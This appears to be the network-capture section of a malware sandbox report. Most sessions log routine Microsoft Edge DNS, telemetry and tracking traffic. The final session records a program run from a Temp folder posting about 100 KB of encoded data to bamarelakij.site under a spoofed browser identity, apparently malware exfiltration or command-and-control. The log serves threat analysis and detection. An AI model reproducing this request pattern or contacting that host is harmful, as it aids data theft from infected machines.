2025-01-06 22:05:05 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2025-01-06 22:05:05 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 06 Jan 2025 22:05:05 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fdf01ed4d504387-EWR
alt-svc: h3=":443"; ma=86400
2025-01-06 22:05:05 UTC | 468 | IN | Data Ascii: wwwgstaticcom)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49818 | 162.159.61.3 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:06 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-06 22:05:06 UTC | 128 | OUT | Data Ascii: assetsmsncom)UQ
2025-01-06 22:05:06 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 06 Jan 2025 22:05:06 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fdf01f34bac42cc-EWR
alt-svc: h3=":443"; ma=86400
2025-01-06 22:05:06 UTC | 468 | IN | Data Ascii: assetsmsncomTEassetsmsncomedgekeynet,ie28578dakamaiedgeCTXTXTXTX TXTX"TXTX!TX)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49817 | 162.159.61.3 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:06 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2025-01-06 22:05:06 UTC | 128 | OUT | Data Ascii: assetsmsncomA)UQ
2025-01-06 22:05:06 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 06 Jan 2025 22:05:06 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8fdf01f348f70f70-EWR
alt-svc: h3=":443"; ma=86400
2025-01-06 22:05:06 UTC | 468 | IN | Data Ascii: assetsmsncomASassetsmsncomedgekeynet,e28578dakamaiedgeC[2.n0d]hostmasterakamaig|R)%!


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49786 | 18.244.18.32 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:07 UTC | 925 | OUT | GET /b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-06 22:05:07 UTC | 956 | IN | HTTP/1.1 302 Found
Content-Length: 0
Connection: close
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:07 GMT
                                                                                                                                                            Location: /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                            set-cookie: UID=10A5c11b12c97664656d6bc1736201107; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                            set-cookie: XID=10A5c11b12c97664656d6bc1736201107; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                            Via: 1.1 872b8cb7808b8e013ecc6c3cc24aa826.cloudfront.net (CloudFront)
                                                                                                                                                            X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                            X-Amz-Cf-Id: QuIKagpYhrlDpOkCzT-pBHv7iU8JpPOQxCE37NvKODrXXL5CelBihg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49847 | 20.189.173.4 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:08 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201107291&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 3856
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
2025-01-06 22:05:08 UTC | 3856 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 30 35 3a 30 37 2e 32 38 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 39 31 39 35 33 39 37 37 2d 34 34 63 34 2d 34 37 30 38 2d 62 38 35 37 2d 63 39 37 39 61 31 38 36 36 36 61 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 36 37 31 37 38 39 38 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-06T22:05:07.287Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
2025-01-06 22:05:08 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=315f1acc0ca243a2a88711bd08f3ea39&HASH=315f&LV=202501&V=4&LU=1736201108692; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:08 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=67e93195282a489d980309644e92b841; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:08 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1401
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 06 Jan 2025 22:05:08 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49849 | 108.139.47.50 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:08 UTC | 1012 | OUT | GET /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: UID=10A5c11b12c97664656d6bc1736201107; XID=10A5c11b12c97664656d6bc1736201107
2025-01-06 22:05:08 UTC | 326 | IN | HTTP/1.1 204 No Content
Connection: close
Date: Mon, 06 Jan 2025 22:05:08 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 2c6a244ba6cf015578de7d0a0b6908d4.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK50-P1
X-Amz-Cf-Id: ELWoomUO6tqwAarym1l7cH-HV9p2yJTduU9Qj87Qkm76ShNOlY77jw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49856 | 20.110.205.119 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:09 UTC | 1261 | OUT | GET /c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; SM=T
2025-01-06 22:05:09 UTC | 982 | IN | HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: image/gif
Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
Accept-Ranges: bytes
ETag: "9270eb7934bdb1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; domain=.msn.com; expires=Sat, 31-Jan-2026 22:05:09 GMT; path=/; SameSite=None; Secure; Priority=High;
Set-Cookie: SRM_M=04956DB2EAC862DE2FFB78DEEBAA63F6; domain=c.msn.com; expires=Sat, 31-Jan-2026 22:05:09 GMT; path=/; SameSite=None; Secure;
Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 13-Jan-2025 22:05:09 GMT; path=/; SameSite=None; Secure;
Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 06-Jan-2025 22:15:09 GMT; path=/; SameSite=None; Secure;
Date: Mon, 06 Jan 2025 22:05:09 GMT
Connection: close
Content-Length: 42
2025-01-06 22:05:09 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
Data Ascii: GIF89a!,L;


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            13192.168.2.44987820.189.173.44435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:10 UTC1026OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109258&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 10929
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
2025-01-06 22:05:10 UTC | 10929 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:05:09.257Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
2025-01-06 22:05:10 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=3eb1ebf74977477bb7a5db88cecbe8f6&HASH=3eb1&LV=202501&V=4&LU=1736201110542; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:10 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=75d6df9e6f9c48e0bf38df900cda8b80; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:10 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1284
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 06 Jan 2025 22:05:10 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49879 | 20.189.173.44 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:10 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109269&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 31919
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; _C_ETH=1; msnup=
2025-01-06 22:05:10 UTC | 16384 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:05:09.265Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
2025-01-06 22:05:10 UTC | 15535 | OUT | Data Ascii: ientId":"04956DB2EAC862DE2FFB78DEEBAA63F6","scrollOffset":0,"anoncknm":"app_anon","cookieEnabled":true,"hiddenOnce":false,"muid":"04956DB2EAC862DE2FFB78DEEBAA63F6"},"flight":{"tmpl":"edge-apis:15;nf_usernurturing_init:0_-1;init-dlayout:1;LFMismatchUF:UF:o
2025-01-06 22:05:11 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=6acb1009cb61443fa6f21f062b0bfa77&HASH=6acb&LV=202501&V=4&LU=1736201110821; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:10 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=775d0a8276694a00b762f69ad81486e8; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:10 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1552
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 06 Jan 2025 22:05:10 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49887 | 20.189.173.44 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:11 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201109885&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5379
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
2025-01-06 22:05:11 UTC | 5379 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-06T22:05:09.884Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
2025-01-06 22:05:11 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=cdb332a445824e5d9286e73997915b78&HASH=cdb3&LV=202501&V=4&LU=1736201111239; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:11 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=96ed84cb275f47499dbefa3f9e3ec88a; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:11 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1354
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 06 Jan 2025 22:05:11 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49888 | 20.189.173.44 | 443 | 5632 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-06 22:05:11 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201110262&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 9878
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; msnup=
2025-01-06 22:05:11 UTC | 9878 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-06T22:05:10.261Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"loca
2025-01-06 22:05:11 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=3eca1dab34f5438ca2cdb8661bf2dbd9&HASH=3eca&LV=202501&V=4&LU=1736201111536; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:11 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=fd12f28c77ba4a8e91d34573710e4491; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:11 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1274
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 06 Jan 2025 22:05:11 GMT
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.4  49911        104.21.80.52    443               4176  C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-06 22:05:14 UTC  459                OUT        POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                       fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       Content-Length: 103796
                                                       Host: bamarelakij.site
2025-01-06 22:05:15 UTC  832                IN         HTTP/1.1 204 No Content
                                                       Date: Mon, 06 Jan 2025 22:05:15 GMT
                                                       Connection: close
                                                       v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                       cf-cache-status: DYNAMIC
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ymv821duIS%2F1a7h1xaJpqa1J2aFMG0aovw1ku4jCIXrlq0XBUfynOpik4onwSw4j4FwN3GzqzaYGxVYkiCg%2FaJm3%2FFwh1Xhq%2BKwKdz5GutXwnuDBjHIbEXWzENeytTUN3HED"}],"group":"cf-nel","max_age":604800}
